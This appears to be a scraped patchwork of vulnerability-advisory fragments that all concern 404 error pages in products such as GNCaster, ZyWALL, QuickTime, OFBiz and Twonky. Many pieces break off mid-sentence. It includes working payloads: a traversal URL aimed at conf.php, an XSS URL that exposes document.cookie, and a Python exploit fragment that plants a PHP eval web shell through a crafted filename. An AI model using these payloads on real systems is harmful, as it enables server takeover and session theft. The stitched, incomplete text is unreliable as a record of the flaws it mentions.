404 error
============
The GNCaster software allows communication with clients through a subset
of the HTTP protocol. If an attacker sends an HTTP GET request for a
nonexistent URL path and the request is less than 988 bytes long, the
server reacts with an HTTP 404 error and the message
File "/AAAAAA[...]AAAA" not found on this server.
If the URL path length is 988 bytes or more, the HTTP 404 error is still
returned but the server thread stops before returning the message above.
Let's try this:
http://localhost/vivvo.4.1.5.1/files.php?file=../conf.php
... and we get a 404 error:
Page Not Found
The requested URL was not found on this server.
If you believe this page should be here, please notify the administrator.
companies. The ZyWALL 100 features an ICSA-certified firewall, IPSec VPN
capability, MultiNAT, web page content filtering and an embedded web
configurator for easy configuration and management.
The ZyWALL web-based management interface uses the Referer header when
serving 404 error pages. The vulnerability can be exploited by
requesting a non-existent web page with a specially crafted Referer
header. As the application does not properly sanitize the data contained
in the Referer header, arbitrary script code can be run in the client's browser.
Sample Request:
//////XSS in Neptune Web Server
//404 error page is vulnerable to XSS
//http://www.silver-forge.com/
//
//////Tested on:
//Neptune Web Server 3.0 (Professional Edition)
//
////////Author:
//NetJackal
//http://netjackal.by.ru
the LCD-like screen containing info about the status of the connection.
To exploit this vulnerability it is only necessary that a user follows
an rtsp:// link; if port 554 of the server is closed, QuickTime will
automatically change the transport and try the HTTP protocol on
port 80, and the 404 error message of the server (other error numbers are
valid too) will be displayed in the LCD-like screen.
During my tests I have been able to fully overwrite the return address;
anyway, note that the visible effects of the vulnerability could change
while using the debugger (in attaching mode it's everything
The research is made of two components: a purple paper and a video. The research doesn't just cover boring PoCs, but actual Hollywood-style exploits :-) . Yes, this includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever!
In the paper we only cover new vulnerabilities affecting older _and_ the latest firmware. The most eye-catching ones are perhaps the following issues affecting the latest version of the firmware (2.43):
System-wide Cross-site Request Forgeries (CSRF) – any admin action can be forged by design!
Non-persistent Cross-site Scripting (XSS) on 404 error pages
Persistent Cross-site Scripting (XSS) on the network settings page
Persistent Cross-site Scripting (XSS) on the video viewing page
Persistent Cross-site Scripting (XSS) on the logs viewing facility
For more info please see: http://www.procheckup.com/Vulnerability_2007.php
8.4 A 404-based reflected Cross-Site Scripting vulnerability was found
across the whole application.
When using the ControlServlet, if an invalid request URI is supplied, the
404 error page displays the requested URI without first sanitizing it.
The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/facility/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
Looks like URLScan blocks this vulnerability by default. I've just tried the URL against one of our old Windows 2000 servers, and it gives me a 404 error.
On Jan 10, 2008, at 7:45 PM, Luigi Auriemma wrote:
> To exploit this vulnerability it is only necessary that a user follows
> an rtsp:// link; if port 554 of the server is closed, QuickTime will
> automatically change the transport and try the HTTP protocol on
> port 80, and the 404 error message of the server (other error numbers are
> valid too) will be displayed in the LCD-like screen.
Tried on QuickTime 7.3.10 running on OSX 10.5.1, and the player doesn't
try to connect to port 80 if 554 is closed.
# Python 2 fragment (httplib/urllib); target, port, directory, ver1 and ver2
# are set earlier in the original script and are not shown on this page.
import httplib
import urllib

pt = "?"
pt2 = "&"
# ver1/ver2 record whether the earlier GET probes succeeded; if either
# returned 404, fall back to a "../" path prefix.
if ver1 == "no" or ver2 == "no":
    transversal = ".."
    print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else:
    transversal = ""
conn = httplib.HTTPConnection(target, port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory, pt, pt2), urllib.urlencode({'to': transversal + '/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain", "Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;", "Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
1st VULNERABILITY:
==================
An HTTP GET request to http://twonky:9000/NON-EXISTENT-PAGE results in
a 404 error page containing:
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not
Found</H1>/NON-EXISTENT-PAGE was not found
on this server.</BODY></HTML>
Woodstock components are User Interface Components for the web, based on JavaServer Faces and AJAX.
Woodstock is also part of GlassFish Enterprise Server.
Woodstock has a linked XSS vulnerability in its 404 error page.
Details
*******